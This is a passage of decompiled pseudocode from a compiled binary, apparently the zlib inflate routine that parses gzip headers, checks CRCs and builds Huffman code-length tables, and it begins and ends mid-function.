														_t843 =  !(_v16 >> 8) & 0x00000002 | 0x00000009;
														__eflags = _t843;
														 *_t815 = _t843;
														_t834 = 0;
														goto L29;
													}
												} else {
													 *(_t849 + 0x18) = "unknown compression method";
													goto L25;
												}
											}
											__eflags = _t834 - 0x8b1f;
											if(_t834 != 0x8b1f) {
												goto L19;
											} else {
												_t844 = 0;
												_t815[6] = E013230C1(0, 0, 0);
												_push(0x1f);
												_pop(_t790);
												_v24 = _t790;
												_v23 = 0x8b;
												_t792 = E013230C1(_t815[6],  &_v24, 2);
												_t834 = 0;
												_t815[6] = _t792;
												_v16 = 0;
												_v20 = 0;
												 *_t815 = 1;
												goto L142;
											}
										} else {
											_t25 =  &_v12; // 0x38
											_t793 =  *_t25;
											while(1) {
												__eflags = _t819;
												if(_t819 == 0) {
													goto L331;
												}
												_v8 = _t819 - 1;
												_t813 = ( *_t793 & 0x000000ff) << _t844;
												_t844 = _t844 + 8;
												_t819 = _v8;
												_t834 = _t834 + _t813;
												_t28 =  &_v12; // 0x38
												_t793 =  *_t28 + 1;
												_v16 = _t834;
												_v12 = _t793;
												_v20 = _t844;
												__eflags = _t844 - 0x10;
												if(_t844 < 0x10) {
													continue;
												}
												goto L16;
											}
											goto L331;
										}
									} else {
										 *_t815 = 0xc;
										goto L143;
									}
								case 1:
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L37:
										 *(__ebx + 0x10) = __edx;
										__eflags = __dl - 8;
										if(__dl == 8) {
											__eflags = __edx & 0x0000e000;
											if((__edx & 0x0000e000) == 0) {
												__ecx =  *(__ebx + 0x20);
												__eflags = __ecx;
												if(__ecx != 0) {
													__edx = __edx >> 8;
													__eax = __edx >> 0x00000008 & 0x00000001;
													__eflags = __eax;
													 *__ecx = __eax;
												}
												__eflags =  *(__ebx + 0x10) & 0x00000200;
												if(( *(__ebx + 0x10) & 0x00000200) != 0) {
													_v24 = __dl;
													__eax =  &_v24;
													__eflags = __edx;
													_v23 = __dl;
													 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 2);
												}
												__ecx = _v8;
												__eax = 0;
												__eflags = 0;
												__edx = 0;
												 *__ebx = 2;
												_v16 = 0;
												__edi = 0;
												goto L47;
											}
											 *(__esi + 0x18) = "unknown header flags set";
											goto L39;
										}
										 *(__esi + 0x18) = "unknown compression method";
										goto L39;
									}
									_t70 =  &_v12; // 0x38
									__eax =  *_t70;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										_t73 =  &_v12; // 0x38
										__eax =  *_t73;
										__eax =  *_t73 + 1;
										_v16 = __edx;
										_v12 = __eax;
										_v20 = __edi;
										__eflags = __edi - 0x10;
										if(__edi < 0x10) {
											continue;
										}
										goto L37;
									}
									goto L331;
								case 2:
									L47:
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L51:
										__eax =  *(__ebx + 0x20);
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 4) = __edx;
										}
										__eflags =  *(__ebx + 0x10) & 0x00000200;
										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
											__eax = __edx;
											_v24 = __dl;
											__eax = __edx >> 8;
											_v23 = __al;
											__edx = __edx >> 0x10;
											_v22 = __al;
											__eax =  &_v24;
											__eflags = __edx;
											_v21 = __dl;
											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 4);
										}
										__ecx = _v8;
										__eax = 0;
										__eflags = 0;
										__edx = 0;
										 *__ebx = 3;
										_v16 = 0;
										__edi = 0;
										goto L56;
									}
									_t93 =  &_v12; // 0x38
									__eax =  *_t93;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										_t96 =  &_v12; // 0x38
										__eax =  *_t96;
										__eax =  *_t96 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										goto L51;
									}
									goto L331;
								case 3:
									L56:
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L60:
										__ecx =  *(__ebx + 0x20);
										__eflags = __ecx;
										if(__ecx != 0) {
											__eax = __dl & 0x000000ff;
											 *(__ecx + 8) = __dl & 0x000000ff;
											__ecx = __edx;
											__eax =  *(__ebx + 0x20);
											__ecx = __edx >> 8;
											__eflags = __ecx;
											 *( *(__ebx + 0x20) + 0xc) = __ecx;
										}
										__eflags =  *(__ebx + 0x10) & 0x00000200;
										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
											_v24 = __dl;
											__eax =  &_v24;
											__eflags = __edx;
											_v23 = __dl;
											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 2);
										}
										__ecx = _v8;
										__eax = 0;
										__eflags = 0;
										__edx = 0;
										 *__ebx = 4;
										__edi = 0;
										_v16 = 0;
										_v20 = 0;
										goto L65;
									}
									_t113 =  &_v12; // 0x38
									__eax =  *_t113;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										_t116 =  &_v12; // 0x38
										__eax =  *_t116;
										__eax =  *_t116 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - 0x10;
										if(__edi < 0x10) {
											continue;
										}
										goto L60;
									}
									goto L331;
								case 4:
									L65:
									__eflags =  *(__ebx + 0x10) & 0x00000400;
									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
										__eax =  *(__ebx + 0x20);
										__eflags = __eax;
										if(__eax != 0) {
											_t157 = __eax + 0x10;
											 *_t157 =  *(__eax + 0x10) & 0x00000000;
											__eflags =  *_t157;
										}
										L77:
										 *__ebx = 5;
										goto L78;
									}
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L70:
										__eax =  *(__ebx + 0x20);
										 *(__ebx + 0x40) = __edx;
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 0x14) = __edx;
										}
										__eflags =  *(__ebx + 0x10) & 0x00000200;
										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
											_v24 = __dl;
											__eax =  &_v24;
											__eflags = __edx;
											_v23 = __dl;
											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  &_v24, 2);
										}
										__eax = 0;
										__edi = 0;
										_v16 = 0;
										_v20 = 0;
										goto L77;
									}
									_t137 =  &_v12; // 0x38
									__eax =  *_t137;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										_t140 =  &_v12; // 0x38
										__eax =  *_t140;
										__eax =  *_t140 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - 0x10;
										if(__edi < 0x10) {
											continue;
										}
										goto L70;
									}
									goto L331;
								case 5:
									L78:
									__eflags =  *(__ebx + 0x10) & 0x00000400;
									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
										__edx = 0;
										__eflags = 0;
										L92:
										__ecx = _v8;
										 *(__ebx + 0x40) = __edx;
										 *__ebx = 6;
										goto L94;
									}
									__ecx =  *(__ebx + 0x40);
									__edx = _v8;
									__eflags = __ecx - __edx;
									__ecx =  >  ? __edx : __ecx;
									_v52 = __ecx;
									__eflags = __ecx;
									if(__ecx != 0) {
										__edx =  *(__ebx + 0x20);
										__eflags = __edx;
										if(__edx != 0) {
											__eax =  *(__edx + 0x10);
											_v48 = __eax;
											__eflags = __eax;
											if(__eax != 0) {
												__eax =  *(__edx + 0x14);
												__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
												__edx =  *(__edx + 0x18);
												_v56 = __eax;
												__eflags = __eax - __edx;
												__eax = _v56;
												if(__eflags <= 0) {
													__edx = __ecx;
												} else {
													__edx = __edx - __eax;
												}
												_t173 =  &_v12; // 0x38
												__ecx =  *_t173;
												__eax = __eax + _v48;
												__eflags = __eax;
												__eax = memcpy(__eax,  *_t173, __edx);
												__ecx = _v52;
												__esp = __esp + 0xc;
											}
										}
										__eflags =  *(__ebx + 0x10) & 0x00000200;
										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
											_t179 =  &_v12; // 0x38
											 *(__ebx + 0x18) = E013230C1( *(__ebx + 0x18),  *_t179, __ecx);
										}
										__eax = _v52;
										_v8 = _v8 - __eax;
										_v12 = _v12 + __eax;
										_t187 = __ebx + 0x40;
										 *_t187 =  *(__ebx + 0x40) - __eax;
										__eflags =  *_t187;
									}
									__edx = 0;
									__eflags =  *(__ebx + 0x40);
									if( *(__ebx + 0x40) != 0) {
										goto L331;
									} else {
										goto L92;
									}
								case 6:
									__edx = 0;
									__eflags = 0;
									L94:
									__eflags =  *(__ebx + 0x10) & 0x00000800;
									if(( *(__ebx + 0x10) & 0x00000800) == 0) {
										__eax =  *(__ebx + 0x20);
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 0x1c) = __edx;
										}
										L110:
										__edx = 0;
										 *__ebx = 7;
										 *(__ebx + 0x40) = 0;
										goto L112;
									}
									__eflags = __ecx;
									if(__ecx == 0) {
										goto L331;
									}
									__esi = _v8;
									__eax = __edx;
									_t196 =  &_v12; // 0x38
									__edx =  *_t196;
									while(1) {
										__ecx =  *(__eax + __edx) & 0x000000ff;
										__eax = __eax + 1;
										_v48 = __ecx;
										__ecx =  *(__ebx + 0x20);
										_v56 = __eax;
										__eflags = __ecx;
										if(__ecx != 0) {
											__edx =  *(__ecx + 0x1c);
											__eflags =  *(__ecx + 0x1c);
											if( *(__ecx + 0x1c) != 0) {
												__edx =  *(__ebx + 0x40);
												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
													__ecx =  *(__ecx + 0x1c);
													__eax = _v48;
													 *(__ecx + __edx) = __al;
													_t207 = __ebx + 0x40;
													 *_t207 =  *(__ebx + 0x40) + 1;
													__eflags =  *_t207;
													__eax = _v56;
												}
											}
											_t210 =  &_v12; // 0x38
											__edx =  *_t210;
										}
										__eflags = _v48;
										if(_v48 == 0) {
											break;
										}
										__eflags = __eax - __esi;
										if(__eax < __esi) {
											continue;
										}
										break;
									}
									__eflags =  *(__ebx + 0x10) & 0x00000200;
									_t215 =  &_a4; // 0x38
									__esi =  *_t215;
									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
										 *(__ebx + 0x18) = __eax;
										__eax = _v56;
									}
									__ecx = _v8;
									_v12 = _v12 + __eax;
									__ecx = _v8 - __eax;
									__eflags = _v48;
									_v8 = __ecx;
									if(_v48 != 0) {
										goto L331;
									} else {
										goto L110;
									}
								case 7:
									__edx = 0;
									__eflags = 0;
									L112:
									__eflags =  *(__ebx + 0x10) & 0x00001000;
									if(( *(__ebx + 0x10) & 0x00001000) == 0) {
										__eax =  *(__ebx + 0x20);
										__eflags = __eax;
										if(__eax != 0) {
											 *(__eax + 0x24) = __edx;
										}
										L128:
										__edx = _v16;
										 *__ebx = 8;
										goto L129;
									}
									__eflags = __ecx;
									if(__ecx == 0) {
										goto L331;
									}
									__esi = _v8;
									__eax = __edx;
									_t231 =  &_v12; // 0x38
									__edx =  *_t231;
									while(1) {
										__ecx =  *(__eax + __edx) & 0x000000ff;
										__eax = __eax + 1;
										_v48 = __ecx;
										__ecx =  *(__ebx + 0x20);
										_v56 = __eax;
										__eflags = __ecx;
										if(__ecx != 0) {
											__edx =  *(__ecx + 0x24);
											__eflags =  *(__ecx + 0x24);
											if( *(__ecx + 0x24) != 0) {
												__edx =  *(__ebx + 0x40);
												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
													__ecx =  *(__ecx + 0x24);
													__eax = _v48;
													 *(__ecx + __edx) = __al;
													_t242 = __ebx + 0x40;
													 *_t242 =  *(__ebx + 0x40) + 1;
													__eflags =  *_t242;
													__eax = _v56;
												}
											}
											_t245 =  &_v12; // 0x38
											__edx =  *_t245;
										}
										__eflags = _v48;
										if(_v48 == 0) {
											break;
										}
										__eflags = __eax - __esi;
										if(__eax < __esi) {
											continue;
										}
										break;
									}
									__eflags =  *(__ebx + 0x10) & 0x00000200;
									_t250 =  &_a4; // 0x38
									__esi =  *_t250;
									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
										 *(__ebx + 0x18) = __eax;
										__eax = _v56;
									}
									__ecx = _v8;
									_v12 = _v12 + __eax;
									__ecx = _v8 - __eax;
									__eflags = _v48;
									_v8 = __ecx;
									if(_v48 != 0) {
										goto L331;
									} else {
										goto L128;
									}
								case 8:
									L129:
									__eflags =  *(__ebx + 0x10) & 0x00000200;
									if(( *(__ebx + 0x10) & 0x00000200) == 0) {
										__edx = 0;
										__eflags = 0;
										L138:
										__ecx =  *(__ebx + 0x20);
										__eflags = __ecx;
										if(__ecx != 0) {
											 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
											__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
											__eflags = __eax;
											 *(__ecx + 0x2c) = __eax;
											__eax =  *(__ebx + 0x20);
											 *( *(__ebx + 0x20) + 0x30) = 1;
										}
										__eax = E013230C1(__edx, __edx, __edx);
										 *(__ebx + 0x18) = __eax;
										 *(__esi + 0x30) = __eax;
										 *__ebx = 0xb;
										goto L141;
									}
									_push(0x10);
									_pop(__eax);
									__eflags = __edi - __eax;
									if(__edi >= __eax) {
										L134:
										__eax =  *(__ebx + 0x18) & 0x0000ffff;
										__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
										if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
											__edx = 0;
											__edi = 0;
											_v16 = 0;
											_v20 = 0;
											goto L138;
										}
										 *(__esi + 0x18) = "header crc mismatch";
										goto L25;
									}
									_t265 =  &_v12; // 0x38
									__eax =  *_t265;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										_t268 =  &_v12; // 0x38
										__eax =  *_t268;
										__eax =  *_t268 + 1;
										_v16 = __edx;
										_v12 = __eax;
										_v20 = __edi;
										__eflags = __edi - 0x10;
										if(__edi < 0x10) {
											continue;
										}
										goto L134;
									}
									goto L331;
								case 9:
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L151:
										__ecx = __edx;
										__edi = 0xff00;
										__ecx = __edx & 0x0000ff00;
										__edx = __edx << 0x10;
										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
										__edx = __edx >> 8;
										__eax = __edx >> 0x00000008 & 0x0000ff00;
										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
										__edx = __edx >> 0x18;
										__ecx = _v8;
										__eax = __eax + __edx;
										 *(__ebx + 0x18) = __eax;
										 *(__esi + 0x30) = __eax;
										__eax = 0;
										__edx = 0;
										 *__ebx = 0xa;
										_v16 = 0;
										__edi = 0;
										goto L153;
									}
									__eax = _v12;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										__eax = _v12;
										__eax = _v12 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										goto L151;
									}
									goto L331;
								case 0xa:
									__eax = 0;
									__eflags = 0;
									L153:
									__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
									if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
										__eax = _v32;
										 *(__esi + 0xc) = _v32;
										__eax = _v28;
										 *(__esi + 0x10) = _v28;
										__eax = _v12;
										 *__esi = _v12;
										 *(__esi + 4) = __ecx;
										 *(__ebx + 0x38) = __edx;
										 *(__ebx + 0x3c) = __edi;
										_push(2);
										goto L145;
									}
									__eax = E01322E91(__eax, __eax, __eax);
									__edx = _v16;
									__ecx = _v8;
									 *(__ebx + 0x18) = __eax;
									 *(__esi + 0x30) = __eax;
									 *__ebx = 0xb;
									goto L155;
								case 0xb:
									L155:
									__eflags = _a8 - 5;
									if(_a8 == 5) {
										goto L331;
									}
									__eflags = _a8 - 6;
									if(_a8 == 6) {
										goto L331;
									}
									goto L157;
								case 0xc:
									L157:
									__eflags =  *(__ebx + 4);
									if( *(__ebx + 4) == 0) {
										__eflags = __edi - 3;
										if(__edi >= 3) {
											L163:
											__eax = __edx;
											__edx = __edx >> 1;
											 *(__ebx + 4) = __eax;
											__edx = __edx & 0x00000003;
											__eax = __edx & 0x00000003;
											__eflags = __eax;
											if(__eax == 0) {
												 *__ebx = 0xd;
												L172:
												__edx = __edx >> 2;
												__edi = __edi - 3;
												L29:
												_v16 = _t834;
												_v20 = _t844;
												goto L142;
											}
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												__eax = E01321718(__ebx);
												 *__ebx = 0x13;
												__eflags = _a8 - 6;
												if(_a8 != 6) {
													goto L172;
												}
												__edx = __edx >> 2;
												__edi = __edi - 3;
												_v16 = __edx;
												goto L331;
											}
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												_push(0x10);
												_pop(__eax);
												 *__ebx = __eax;
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax == 0) {
													 *(__esi + 0x18) = "invalid block type";
													 *__ebx = 0x1d;
												}
											}
											goto L172;
										}
										__eax = _v12;
										while(1) {
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L331;
											}
											__eax =  *__eax & 0x000000ff;
											_v8 = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx = _v8;
											__edx = __edx + __eax;
											__eax = _v12;
											__eax = _v12 + 1;
											_v16 = __edx;
											_v12 = __eax;
											__eflags = __edi - 3;
											if(__edi < 3) {
												continue;
											}
											goto L163;
										}
										goto L331;
									}
									__ecx = __edi;
									 *__ebx = 0x1a;
									__ecx = __edi & 0x00000007;
									__edx = __edx >> __cl;
									__edi = __edi - __ecx;
									_v16 = __edx;
									_v20 = __edi;
									goto L142;
								case 0xd:
									__edi = __edi & 0x00000007;
									__edi = __edi - (__edi & 0x00000007);
									__edx = __edx >> __cl;
									_v16 = __edx;
									_v20 = __edi;
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										L177:
										__eax = __edx;
										__ecx = __edx;
										__eax =  !__edx;
										__ecx = __edx & 0x0000ffff;
										__eax =  !__edx >> 0x10;
										__eflags = __ecx -  !__edx >> 0x10;
										if(__ecx ==  !__edx >> 0x10) {
											__eax = 0;
											 *(__ebx + 0x40) = __ecx;
											__eflags = _a8 - 6;
											__edx = 0;
											__ecx = _v8;
											__edi = 0;
											_v16 = 0;
											_v20 = 0;
											 *__ebx = 0xe;
											if(_a8 == 6) {
												goto L332;
											}
											goto L180;
										}
										 *(__esi + 0x18) = "invalid stored block lengths";
										goto L25;
									}
									__eax = _v12;
									while(1) {
										__ecx = _v8;
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L332;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__edx = __edx + __eax;
										_v20 = __edi;
										__eax = _v12;
										__eax = _v12 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										}
										goto L177;
									}
									goto L332;
								case 0xe:
									L180:
									 *__ebx = 0xf;
									goto L181;
								case 0xf:
									L181:
									__eax =  *(__ebx + 0x40);
									__eflags = __eax;
									if(__eax == 0) {
										 *__ebx = 0xb;
										goto L143;
									}
									__eflags = __eax - __ecx;
									__eax =  >  ? __ecx : __eax;
									__eflags = __eax - _v28;
									__eax =  >  ? _v28 : __eax;
									_v56 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										goto L331;
									}
									__eax = memcpy(_v32, _v12, __eax);
									__eax = _v56;
									__esp = __esp + 0xc;
									__ecx = _v8;
									_v12 = _v12 + __eax;
									__ecx = _v8 - __eax;
									_v28 = _v28 - __eax;
									_v32 = _v32 + __eax;
									 *(__ebx + 0x40) =  *(__ebx + 0x40) - __eax;
									__edx = _v16;
									_v8 = __ecx;
									goto L143;
								case 0x10:
									__eflags = __edi - 0xe;
									if(__edi >= 0xe) {
										L189:
										__eax = __edx;
										__edi = __edi - 0xe;
										__eax = __edx & 0x0000001f;
										__edx = __edx >> 5;
										__eax = __eax + 0x101;
										_v20 = __edi;
										 *(__ebx + 0x60) = __eax;
										__eax = __edx;
										__eax = __edx & 0x0000001f;
										__edx = __edx >> 5;
										 *(__ebx + 0x64) = __eax;
										__eax = __edx;
										__eax = __edx & 0x0000000f;
										__edx = __edx >> 4;
										__eax = __eax + 4;
										_v16 = __edx;
										__eflags =  *(__ebx + 0x60) - 0x11e;
										 *(__ebx + 0x5c) = __eax;
										if( *(__ebx + 0x60) > 0x11e) {
											L192:
											 *(__esi + 0x18) = "too many length or distance symbols";
											goto L39;
										}
										__eflags =  *(__ebx + 0x64) - 0x1e;
										if( *(__ebx + 0x64) > 0x1e) {
											goto L192;
										}
										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
										_push(0x11);
										_pop(__eax);
										 *__ebx = __eax;
										goto L198;
									}
									__eax = _v12;
									while(1) {
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L331;
										}
										__eax =  *__eax & 0x000000ff;
										_v8 = __ecx;
										__ecx = __edi;
										__eax = __eax << __cl;
										__edi = __edi + 8;
										__ecx = _v8;
										__edx = __edx + __eax;
										__eax = _v12;
										__eax = _v12 + 1;
										_v16 = __edx;
										_v12 = __eax;
										__eflags = __edi - 0xe;
										if(__edi < 0xe) {
											continue;
										}
										goto L189;
									}
									goto L331;
								case 0x11:
									while(1) {
										L198:
										__eax =  *(__ebx + 0x68);
										__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
										if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
											break;
										}
										__eflags = __edi - 3;
										if(__edi >= 3) {
											L197:
											__eax =  *(__ebx + 0x68);
											__edx = __edx & 0x00000007;
											__edx = __edx >> 3;
											_v16 = __edx;
											__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
											 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
											__edi = __edi - 3;
											__eflags = __edi;
											__ecx = _v8;
											_v20 = __edi;
											continue;
										}
										__eax = _v12;
										while(1) {
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L331;
											}
											__eax =  *__eax & 0x000000ff;
											_v8 = __ecx;
											__ecx = __edi;
											__eax = __eax << __cl;
											__edi = __edi + 8;
											__ecx = _v8;
											__edx = __edx + __eax;
											__eax = _v12;
											__eax = _v12 + 1;
											_v16 = __edx;
											_v12 = __eax;
											__eflags = __edi - 3;
											if(__edi < 3) {
												continue;
											}
											goto L197;
										}
										goto L331;
									}
									while(1) {
										__eflags =  *(__ebx + 0x68) - 0x13;
										if( *(__ebx + 0x68) >= 0x13) {
											break;
										}
										__eax =  *(__ebx + 0x68);
										__ecx = 0;
										__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
										 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
										_t389 = __ebx + 0x68;
										 *_t389 =  *(__ebx + 0x68) + 1;
										__eflags =  *_t389;
									}
									__eax = __ebx + 0x530;
									__ecx = __ebx + 0x6c;
									 *(__ebx + 0x4c) = __eax;
									 *(__ebx + 0x6c) = __eax;
									__edx = __ebx + 0x54;
									__eax = __ebx + 0x2f0;
									 *(__ebx + 0x54) = 7;
									__eax = __ebx + 0x70;
									__eax = E013233B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
									_v36 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
										 *__ebx = 0x12;
										goto L233;
									}
									 *(__esi + 0x18) = "invalid code lengths set";
									goto L204;
								case 0x12:
									while(1) {
										L233:
										 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
										__ecx =  *(__ebx + 0x68);
										_v48 = __ecx;
										__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
										if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
											goto L208;
										} else {
											break;
										}
										while(1) {
											L208:
											__ecx =  *(__ebx + 0x54);
											__edx = 0;
											__eax =  *(__ebx + 0x4c);
											1 = 1 << __cl;
											__edx = (1 << __cl) - 1;
											__edx = (1 << __cl) - 0x00000001 & _v16;
											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											_v56 = __eax;
											__eflags = (__cl & 0x000000ff) - __edi;
											if((__cl & 0x000000ff) <= __edi) {
												break;
											}
											__ecx = _v8;
											__eflags = __ecx;
											if(__ecx == 0) {
												goto L332;
											}
											__edx = _v12;
											_v8 = __ecx;
											__ecx = __edi;
											 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
											_v16 = _v16 + (( *__edx & 0x000000ff) << __cl);
											_v12 = __edx;
											__edi = __edi + 8;
											__eflags = __edi;
										}
										__edx = __eax;
										_push(0x10);
										__edx = __eax >> 0x10;
										_pop(__ecx);
										__eflags = __dx - __cx;
										if(__eflags >= 0) {
											if(__eflags != 0) {
												__edx = _v16;
												_push(0x11);
												_pop(__ecx);
												__eflags = _v54 - __cx;
												__ecx = __ah & 0x000000ff;
												if(_v54 != __cx) {
													_v20 = __ecx;
													while(1) {
														_t453 = __ecx + 7; // 0x18
														__eax = _t453;
														__eflags = __edi - _t453;
														if(__edi >= _t453) {
															break;
														}
														__ecx = _v8;
														__eflags = __ecx;
														if(__ecx == 0) {
															goto L332;
														}
														__eax = _v12;
														_v8 = __ecx;
														__ecx = __edi;
														 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
														__ecx = _v20;
														__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
														_v12 = _v12 + 1;
														__edi = __edi + 8;
														_v16 = __edx;
													}
													__edx = __edx >> __cl;
													__ecx = __edx;
													__edx = __edx >> 7;
													__ecx = __ecx & 0x0000007f;
													_push(0xfffffff9);
													_pop(__eax);
													__ecx = __ecx + 0xb;
													__eax = __eax - _v20;
													__eflags = __eax;
													L228:
													_v56 = _v56 & 0x00000000;
													__edi = __edi + __eax;
													__eflags = __edi;
													L229:
													 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
													_v52 = __ecx;
													__ecx = __ecx + _v48;
													_v16 = __edx;
													_v20 = __edi;
													__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
													if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
														 *(__esi + 0x18) = "invalid bit length repeat";
														 *__ebx = 0x1d;
														L237:
														__eflags =  *__ebx - 0x1d;
														if( *__ebx == 0x1d) {
															L141:
															__edx = _v16;
															goto L142;
														}
														__eax = 0;
														__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
														if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
															__eax = __ebx + 0x530;
															__ecx = __ebx + 0x6c;
															 *(__ebx + 0x4c) = __eax;
															 *(__ebx + 0x6c) = __eax;
															__edx = __ebx + 0x54;
															__eax = __ebx + 0x2f0;
															 *(__ebx + 0x54) = 9;
															__eax = __ebx + 0x70;
															__eax = E013233B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
															_v36 = __eax;
															__eflags = __eax;
															if(__eax == 0) {
																__ecx = __ebx + 0x6c;
																__eax =  *__ecx;
																__edx = __ebx + 0x58;
																 *(__ebx + 0x50) =  *__ecx;
																__ebx + 0x2f0 =  *(__ebx + 0x60);
																__eax =  *(__ebx + 0x60) + 0x38;
																 *(__ebx + 0x58) = 6;
																__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
																__eax = E013233B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
																_v36 = __eax;
																__eflags = __eax;
																if(__eax == 0) {
																	__eflags = _a8 - 6;
																	__ecx = _v8;
																	 *__ebx = 0x13;
																	if(_a8 == 6) {
																		goto L332;
																	}
																	__edx = _v16;
																	goto L246;
																}
